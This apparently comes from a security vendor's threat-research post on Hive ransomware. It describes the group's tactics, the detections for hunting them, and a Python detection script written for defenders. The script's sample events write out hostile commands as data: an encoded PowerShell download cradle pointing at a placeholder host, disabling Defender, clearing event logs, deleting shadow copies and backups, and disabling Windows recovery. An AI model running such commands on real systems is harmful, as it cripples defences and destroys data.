By Rabindra Dev Bhatta, Security Research
A comparatively new ransomware family, Hive has been in the wild for around a year and a half but is already among the top ransomware threats in the industry. Threat actors have used Hive against a wide range of companies and critical infrastructure sectors, particularly healthcare, government facilities, communications, critical manufacturing, and information technology.
According to the Joint Cybersecurity Advisory published by the FBI, CISA, and HHS as part of the #StopRansomware effort, as of November 2022 Hive ransomware actors had targeted more than 1,300 businesses globally and collected almost US$100 million in ransom payments.
Like BlackCat and LockBit, the Hive syndicate operates as a Ransomware-as-a-Service (RaaS) provider. It was first reported in June 2021 in an attack against a Canadian IT company. Hive made headlines in August 2021 when its attacks interrupted the clinical and financial operations of three hospitals in Ohio and West Virginia. On the ground, the emergency rooms had to divert patients and cancel radiological tests and urgent surgeries, and the FBI issued an alert detailing the indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) used by Hive ransomware.
Compared to other ransomware actors, the Hive syndicate is quite organized, with multiple portals and a clear division of labor. The developers build, maintain, and upgrade the Hive infrastructure (the malware variants, the “HiveLeaks” data leak website, and the negotiation site), while the affiliates are responsible for locating victims, infecting them, stealing their files, and spreading Hive ransomware across victims’ networks. Hive delivers RaaS through three primary API-based portals: the affiliate portal, the victim portal, and the data leak site.
We at Logpoint detonated multiple variants of the ransomware and have attempted to build a comprehensive understanding of it, and detections for it, in the following sections.
Hive fast facts
First reported in June 2021 and has amassed almost $100 million in ransom from 1,300 global businesses.
Affiliates discovered to have used spam campaigns, leaked credentials, and vulnerable servers for initial access.
Targets healthcare, government facilities, communications, critical manufacturing, and information technology.
Known for strict negotiations and double, sometimes triple, extortion.
Known to re-infect victim organizations that restore infrastructure without making a ransom payment.
Has multiple variants affecting Windows, Linux, FreeBSD, and VMware ESXi; the latest iteration is written in Rust, while older ones were developed in Go.
Technical analysis of Hive
For our research, the Hive ransomware variants under consideration were obtained from vx-underground, and samples from the tria.ge sandbox were also referenced. The results are summarized below.
The common initial access methods, phishing with malicious attachments [T1566] and leaked or compromised credentials [T1078], remain the prominent approaches for Hive ransomware threat actors. Hive actors have also been found exploiting vulnerabilities in public-facing applications [T1190], including the Microsoft Exchange ProxyShell chain covered in the hunting section below.
In short, the method used for initial access into a target depends on the affiliate’s capabilities.
Execution and persistence
Right after Hive actors gain a foothold on the target system, they attempt to establish persistence by executing an obfuscated PowerShell script [T1059] that forms part of their Cobalt Strike beaconing for command and control and lateral movement within the target network.
Next, they run a series of commands to stop or disable security-relevant services and processes such as SamSs, SDRSVC, SstpSvc, vmicvss, VSS, wbengine, WebClient, and UnistoreSvc_196e4, using the system executables “net.exe”/“net1.exe” and “sc.exe”; left running, these services might otherwise hinder the attack chain.
The malware inhibits detection by modifying registry entries [T1112] through “reg.exe” and scheduling tasks through “schtasks.exe” in order to disable or stop security monitoring services and Windows Defender real-time protection.
Hive uses “MpCmdRun.exe” to delete antivirus definitions and disable protection [T1562].
Hive also removes traces of its activity by clearing the System, Security, and Application event logs [T1070] with the “wevtutil.exe” binary.
Actions on objectives
Once defenses are disabled, Hive quietly exfiltrates data, archived with tools such as “7-Zip” and moved with “Rclone”, to anonymous file-sharing and cloud storage services [T1537] such as “Mega”, “Anonfiles”, “Ufile”, and “Privatelab”. It then deletes the shadow copies using “vssadmin.exe” and “wmic.exe”, out of the user’s sight to avoid raising suspicion, and deletes the system state backups using “wbadmin.exe” to make the system unrecoverable.
To leave no stone unturned, the malware performs one last step before encrypting everything: it modifies the system’s boot configuration data with “bcdedit.exe” to block the administrator’s access to the Windows Recovery Environment’s System Image Recovery capability, thereby inhibiting system recovery [T1490].
Finally, the malware carries out its actual agenda: it runs the ransomware and encrypts the files on the system [T1486]. The newer variants use Elliptic Curve Diffie-Hellman (ECDH) over Curve25519 for key agreement and XChaCha20-Poly1305 (authenticated encryption built on the ChaCha20 stream cipher) for the file encryption. The ransomware repeats this on every system it can reach.
Once the files have been encrypted, a ransom note named “HOW_TO_DECRYPT.txt” is dropped and opened in Notepad. It tells users what has happened to their system, gives the URL and login credentials for Hive’s .onion portal for negotiating with the “Sales Department”, and lists the actors’ guidelines as a warning.
Hunting Hive with Logpoint
Let’s begin the hunt from the start of the incident. Familiar to attackers and defenders alike, spearphishing is still the most widely used technique for exploiting the human element and getting into the target system, so we can watch for suspicious processes spawned by Microsoft Office applications.
We have also observed Hive exploiting the Microsoft Exchange ProxyShell vulnerability chain. The relevant activity can be monitored through “Exchange ProxyShell Pattern Detected” and “Successful Exchange ProxyShell Attack”.
Next comes Cobalt Strike beaconing, another widely used attacker tool, which Hive uses for execution and for maintaining persistence on the system. Logpoint has continuously provided its customers with detections for the tools and techniques that threat actors use across most of their campaigns; detections for tools like Cobalt Strike and Mimikatz, both also leveraged by Hive actors, have been published and reviewed repeatedly.
Going a step further, Hive actors have been found executing base64-encoded commands to bypass detection during the beaconing phase. Encoded commands that decode to suspicious keywords are therefore of great interest and can be viewed through “Malicious Base64 Encoded PowerShell Keywords in Command Lines Detected”.
Hive actors then terminate or disable multiple processes and system services. We can get consolidated visibility into this with “High Number of Service Stop or Task Kill in Short Span”.
Here, we treat more than ten occurrences of the event (a process stop or a service disable) in a short window as the trigger; you can tune the threshold to your environment and requirements.
To evade native defenses and stay stealthy for its later activity, Hive uses “reg.exe” to modify the registry values of Microsoft Windows Defender, which could otherwise detect its actions and trigger alerts. Detecting these changes is therefore a top priority, through “Windows Defender Antivirus Disabled via Registry Modification” and “Windows Security Health Disabled via Registry Modification”.
Hive abuses the Malware Protection Command Line Utility, “MpCmdRun.exe”, to remove some or all of the antivirus signature definitions present on the system. This can be detected with “Microsoft Defender Antivirus Definitions Removal Detected” and “Microsoft Defender Disabling Attempt via PowerShell”.
To leave no trace of its activity, Hive also clears the System, Security, and Application logs, mostly using the “wevtutil.exe” system binary, which can be detected by “Suspicious Eventlog Clear or Configuration Using Wevtutil Detected”.
Once the actors are confident nothing stands in their way, they begin exfiltrating important organizational data. We found Hive actors using “7z.exe” to compress or encrypt data before moving it to cloud storage services like Mega, Anonfiles, and others. This activity can be detected by monitoring process creation and outbound connections of these archiving and upload utilities.
Alongside the exfiltration, they delete or destroy shadow copies and system state backups, leaving the organization with no backups or recovery points. This can be detected with “Shadow Copy Deletion Using OS Utilities Detected”.
Further, the threat actors completely cut off the system administrators’ access to the Windows Recovery Environment by abusing “bcdedit.exe” to modify the boot policy, which can be detected as “Possible Modification of Boot Configuration”.
The final act of the show, the ransomware itself, begins its encryption only after all of the above and drops its message in a Notepad text file. By then the damage is done, so early detection of the preceding stages is what matters.
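As an added example (not Logpoint’s own queries or code, and not taken from any Hive sample), the following Python script runs approximations of the hunts described in this section, and of the behaviours described under Execution and persistence and Actions on objectives, over process-creation events in the shape of Sysmon Event ID 1 / Security 4688 records. The events, the host name, the file paths, the encoded PowerShell payload, and the rule names are all constructed for illustration; the service names and system binaries are the ones named in the analysis above. The burst rule implements the “more than ten stops in a short span” threshold from the hunting section as a sliding window.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

CMD = r"C:\Windows\System32\cmd.exe"


# Constructed process-creation records (Sysmon EID 1 / Security 4688 shape), not real Hive telemetry.
def ev(ts, parent, image, cmdline, host="ws01"):
    return {"host": host, "ts": datetime.fromisoformat(ts), "parent": parent, "image": image, "cmd": cmdline}


# Constructed payload: an encoded download cradle of the kind a Cobalt Strike stager would run.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16le")
).decode()

EVENTS = [
    ev("2023-01-10T09:00:01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
       CMD, "cmd.exe /c powershell -nop -w hidden -enc " + ENCODED),
    ev("2023-01-10T09:00:02", CMD, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       "powershell -nop -w hidden -enc " + ENCODED),
    ev("2023-01-10T09:05:10", CMD, r"C:\Windows\System32\reg.exe",
       r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" '
       r'/v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f'),
    ev("2023-01-10T09:05:11", CMD, r"C:\Program Files\Windows Defender\MpCmdRun.exe",
       "MpCmdRun.exe -RemoveDefinitions -All"),
    ev("2023-01-10T09:05:12", CMD, r"C:\Windows\System32\wevtutil.exe", "wevtutil cl Security"),
    ev("2023-01-10T09:06:00", CMD, r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ev("2023-01-10T09:06:01", CMD, r"C:\Windows\System32\wbem\wmic.exe", "wmic shadowcopy delete"),
    ev("2023-01-10T09:06:02", CMD, r"C:\Windows\System32\wbadmin.exe", "wbadmin delete catalog -quiet"),
    ev("2023-01-10T09:06:03", CMD, r"C:\Windows\System32\bcdedit.exe", "bcdedit /set {default} recoveryenabled No"),
    ev("2023-01-10T09:07:00", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
       "notepad.exe HOW_TO_DECRYPT.txt"),  # benign on its own; no rule below should fire on it
]
# The service-stop burst: one "net stop" and one "sc config ... disabled" per service named in the analysis.
SERVICES = ["SamSs", "SDRSVC", "SstpSvc", "vmicvss", "VSS", "wbengine", "WebClient", "UnistoreSvc_196e4"]
for i, svc in enumerate(SERVICES):
    t = (datetime(2023, 1, 10, 9, 3, 0) + timedelta(seconds=i)).isoformat()
    EVENTS.append(ev(t, CMD, r"C:\Windows\System32\net.exe", f"net stop {svc} /y"))
    EVENTS.append(ev(t, CMD, r"C:\Windows\System32\sc.exe", f"sc config {svc} start= disabled"))

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
PS_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")

# Single-event rules: (images the rule applies to, regex over the command line). Names are this example's own.
SINGLE_EVENT_RULES = {
    "defender_registry_tampering": (("reg.exe",),
                                    re.compile(r"Windows Defender.*(DisableAntiSpyware|DisableRealtimeMonitoring)", re.I)),
    "defender_definitions_removed": (("mpcmdrun.exe",), re.compile(r"-RemoveDefinitions", re.I)),
    "eventlog_cleared": (("wevtutil.exe",), re.compile(r"\b(cl|clear-log)\b", re.I)),
    "shadow_copy_deletion": (("vssadmin.exe", "wmic.exe", "wbadmin.exe"),
                             re.compile(r"delete shadows|shadowcopy delete|delete catalog|delete systemstatebackup", re.I)),
    "boot_config_tampering": (("bcdedit.exe",),
                              re.compile(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures", re.I)),
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmd):
    """Return the decoded script when the command line carries -e/-ec/-enc/-EncodedCommand <base64>, else None."""
    m = re.search(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")  # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events, burst_threshold=10, window=timedelta(minutes=5)):
    """Run every rule over the events; return {rule_name: [evidence, ...]} for the rules that fired."""
    findings = defaultdict(list)
    stop_times = defaultdict(list)  # host -> timestamps of service-stop / task-kill commands
    for e in sorted(events, key=lambda x: x["ts"]):
        img, parent, cmd = basename(e["image"]), basename(e["parent"]), e["cmd"]
        if parent in OFFICE and img in SHELL_CHILDREN:  # Office application spawning a shell/LOLBin
            findings["office_spawns_shell"].append(cmd)
        if img == "powershell.exe":  # decode -enc payloads and look for cradle keywords
            script = decode_encoded_powershell(cmd)
            if script and any(k in script.lower() for k in PS_KEYWORDS):
                findings["encoded_powershell_keywords"].append(script)
        for rule, (images, pattern) in SINGLE_EVENT_RULES.items():
            if img in images and pattern.search(cmd):
                findings[rule].append(cmd)
        if (img in ("net.exe", "net1.exe") and re.search(r"\bstop\b", cmd, re.I)) \
                or (img == "sc.exe" and re.search(r"\bstop\b|start=\s*disabled", cmd, re.I)) \
                or img == "taskkill.exe":
            stop_times[e["host"]].append(e["ts"])
    # Burst rule: more than burst_threshold stop/kill commands on one host inside a sliding window.
    for host, times in stop_times.items():
        for i, t0 in enumerate(times):
            n = sum(1 for t in times[i:] if t - t0 <= window)
            if n > burst_threshold:
                findings["service_stop_burst"].append(f"{host}: {n} stop/kill commands within {window}")
                break
    return dict(findings)


if __name__ == "__main__":
    for rule, hits in hunt(EVENTS).items():
        print(f"[{rule}] {len(hits)} hit(s); first: {hits[0][:80]}")
```

Two design points carry over to a real SIEM rule. First, the encoded-command check decodes the payload before matching keywords, because the base64 form of “IEX” changes with its byte offset and cannot be matched reliably as text. Second, the burst rule is stateful (it needs a time window per host), which is why it cannot be expressed as a single-event match like the others; the same counting logic is what the “High Number of Service Stop or Task Kill in Short Span” alert relies on, and the threshold is the knob to tune per environment.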